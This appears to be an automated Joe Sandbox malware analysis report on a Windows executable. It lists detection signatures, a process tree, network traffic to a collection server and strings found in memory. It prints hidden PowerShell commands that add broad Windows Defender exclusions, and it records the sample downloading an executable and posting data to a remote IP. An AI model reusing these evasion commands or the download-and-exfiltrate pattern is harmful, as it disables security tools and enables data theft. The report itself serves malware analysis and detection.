Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1feP5qTCl0.exe

Overview

General Information

Sample name:1feP5qTCl0.exe
renamed because original name is a hash value
Original sample name:64aaffe3b4d705b9ddbce60e8fd8b9829c20438b8c68ae254e185c0f466e0265.exe
Analysis ID:1499701
MD5:a499c507987982c951093e21df0c0d96
SHA1:fa1a7050198570e016fc4bf3ddd69160e05a8a38
SHA256:64aaffe3b4d705b9ddbce60e8fd8b9829c20438b8c68ae254e185c0f466e0265
Tags:45-125-66-18exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • 1feP5qTCl0.exe (PID: 6120 cmdline: "C:\Users\user\Desktop\1feP5qTCl0.exe" MD5: A499C507987982C951093E21DF0C0D96)
    • powershell.exe (PID: 6024 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5772 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6776 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 480 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4144 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1308 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4996 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rapnewsa.exe (PID: 6044 cmdline: C:\Reka\rapnewsa.exe MD5: 2D4E723C184D9403B078E53F2DE74A23)
      • WerFault.exe (PID: 3992 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 56480 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1feP5qTCl0.exe", ParentImage: C:\Users\user\Desktop\1feP5qTCl0.exe, ParentProcessId: 6120, ParentProcessName: 1feP5qTCl0.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 6024, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1feP5qTCl0.exe", ParentImage: C:\Users\user\Desktop\1feP5qTCl0.exe, ParentProcessId: 6120, ParentProcessName: 1feP5qTCl0.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 6024, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1feP5qTCl0.exe", ParentImage: C:\Users\user\Desktop\1feP5qTCl0.exe, ParentProcessId: 6120, ParentProcessName: 1feP5qTCl0.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 6024, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Reka\rapnewsa.exeAvira: detection malicious, Label: HEUR/AGEN.1315917
Source: C:\Reka\rapnewsa.exeReversingLabs: Detection: 15%
Source: C:\Reka\rapnewsa.exeVirustotal: Detection: 24%Perma Link
Source: 1feP5qTCl0.exeVirustotal: Detection: 8%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Reka\rapnewsa.exeJoe Sandbox ML: detected
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A41000 CryptUnprotectData,19_2_00A41000
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A41C40 CryptSignHashA,CryptUpdateProtectedState,WinHttpTimeFromSystemTime,19_2_00A41C40
Source: unknownHTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: 1feP5qTCl0.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A48D40 FindFirstFileW,FindNextFileW,FindClose,19_2_00A48D40
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: global trafficHTTP traffic detected: POST /api/receiver/recv HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48Content-Length: 3160Host: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/main/yjsefceawd.json HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/main/nepipirusas.json HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/raw/main/iconozave.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/main/iconozave.exe HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/workhasf/kelm/raw/main/iconozave.exeAccept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /get HTTP/1.1Host: httpbin.orgUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: unknownHTTP traffic detected: POST /api/receiver/recv HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48Content-Length: 3160Host: 45.125.66.18
Source: rapnewsa.exe, 00000013.00000002.2038436475.00000000011D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
Source: rapnewsa.exe, 00000013.00000002.2038436475.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18/api/receiver/recv
Source: rapnewsa.exe, 00000013.00000002.2038436475.000000000118E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18/api/receiver/recvS
Source: rapnewsa.exe, 00000013.00000002.2038436475.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18/api/receiver/recvz
Source: rapnewsa.exe, 00000013.00000002.2038436475.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18/l9
Source: rapnewsa.exe, 00000013.00000002.2038436475.00000000011CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18:443/api/receiver/recv
Source: 1feP5qTCl0.exe, 00000000.00000002.2050595870.000000C00020C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com
Source: 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C000142000.00000004.00001000.00020000.00000000.sdmp, 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C0000FC000.00000004.00001000.00020000.00000000.sdmp, 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C00017C000.00000004.00001000.00020000.00000000.sdmp, 1feP5qTCl0.exe, 00000000.00000002.2050595870.000000C00020C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/workhasf/kelm/raw/main/iconozave.exe
Source: 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/workhasf/kelm/raw/main/iconozave.exeC:
Source: 1feP5qTCl0.exe, 00000000.00000002.2050595870.000000C00020C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.comdefault-src
Source: 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C000086000.00000004.00001000.00020000.00000000.sdmp, 1feP5qTCl0.exe, 00000000.00000002.2050263367.000000C00019A000.00000004.00001000.00020000.00000000.sdmp, 1feP5qTCl0.exe, 00000000.00000002.2050595870.000000C00027E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
Source: 1feP5qTCl0.exe, 00000000.00000002.2050263367.000000C0001A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownHTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: 1feP5qTCl0.exeBinary or memory string: github.com/lxn/win.getRawInputData
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A41470 NtQuerySystemInformation,OpenProcess,GetCurrentProcess,DuplicateHandle,GetFileType,CloseHandle,GetCurrentProcess,DuplicateHandle,CloseHandle,FindCloseChangeNotification,19_2_00A41470
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A43D50 NtClose,NtClose,19_2_00A43D50
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A41610 NtQueryObject,NtQueryObject,19_2_00A41610
Source: C:\Reka\rapnewsa.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 56480
Source: 1feP5qTCl0.exeStatic PE information: Number of sections : 15 > 10
Source: 1feP5qTCl0.exeStatic PE information: Section: /19 ZLIB complexity 0.9991581357758621
Source: 1feP5qTCl0.exeStatic PE information: Section: /32 ZLIB complexity 0.9933081454918032
Source: 1feP5qTCl0.exeStatic PE information: Section: /65 ZLIB complexity 0.9992535231210021
Source: 1feP5qTCl0.exeStatic PE information: Section: /78 ZLIB complexity 0.9908877648782687
Source: classification engineClassification label: mal100.evad.winEXE@25/31@3/4
Source: C:\Users\user\Desktop\1feP5qTCl0.exeFile created: C:\Users\user\Desktop\new_example.txtJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1800:120:WilError_03
Source: C:\Reka\rapnewsa.exeMutant created: \Sessions\1\BaseNamedObjects\082e2202-17f7-4654-a651-ac9a3778e1d7
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxinlifc.kli.ps1Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeFile opened: C:\Windows\system32\83d23f67a6248ede6b2eccd5ae8fcac6e57d0b7d0fac7f974a81445ec731c106AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
Source: 1feP5qTCl0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Reka\rapnewsa.exeSystem information queried: HandleInformation
Source: C:\Users\user\Desktop\1feP5qTCl0.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 1feP5qTCl0.exeVirustotal: Detection: 8%
Source: 1feP5qTCl0.exeString found in binary or memory: failed to construct HKDF label: %sslice bounds out of range [:%x:%y]slice bounds out of range [%x:%y:]out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerunexpected runtime.netpoll error: crypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizehttp: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%network dropped connection on resettransport endpoint is not connectedSubscribeServiceChangeNotificationsreflect.MakeSlice of non-slice type1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKmime: bogus characters after %%: %qpersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=hpack: invalid Huffman-encoded datadynamic table size update too largefile type does not support deadlinebigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesscrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)flate: corrupt input before offset '_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferAdd-MpPreference -ExclusionPath '%s'json: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodsstrings.Builder.Grow: negative countstrings: Join output length overflowaccessing a corrupted shared libraryTime.UnmarshalBinary: invalid lengthmethod ABI and value ABI don't align444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzexp
Source: 1feP5qTCl0.exeString found in binary or memory: failed to construct HKDF label: %sslice bounds out of range [:%x:%y]slice bounds out of range [%x:%y:]out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerunexpected runtime.netpoll error: crypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizehttp: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%network dropped connection on resettransport endpoint is not connectedSubscribeServiceChangeNotificationsreflect.MakeSlice of non-slice type1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKmime: bogus characters after %%: %qpersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=hpack: invalid Huffman-encoded datadynamic table size update too largefile type does not support deadlinebigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesscrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)flate: corrupt input before offset '_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferAdd-MpPreference -ExclusionPath '%s'json: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodsstrings.Builder.Grow: negative countstrings: Join output length overflowaccessing a corrupted shared libraryTime.UnmarshalBinary: invalid lengthmethod ABI and value ABI don't align444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzexp
Source: 1feP5qTCl0.exeString found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
Source: unknownProcess created: C:\Users\user\Desktop\1feP5qTCl0.exe "C:\Users\user\Desktop\1feP5qTCl0.exe"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exe
Source: C:\Reka\rapnewsa.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 56480
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"Jump to behavior
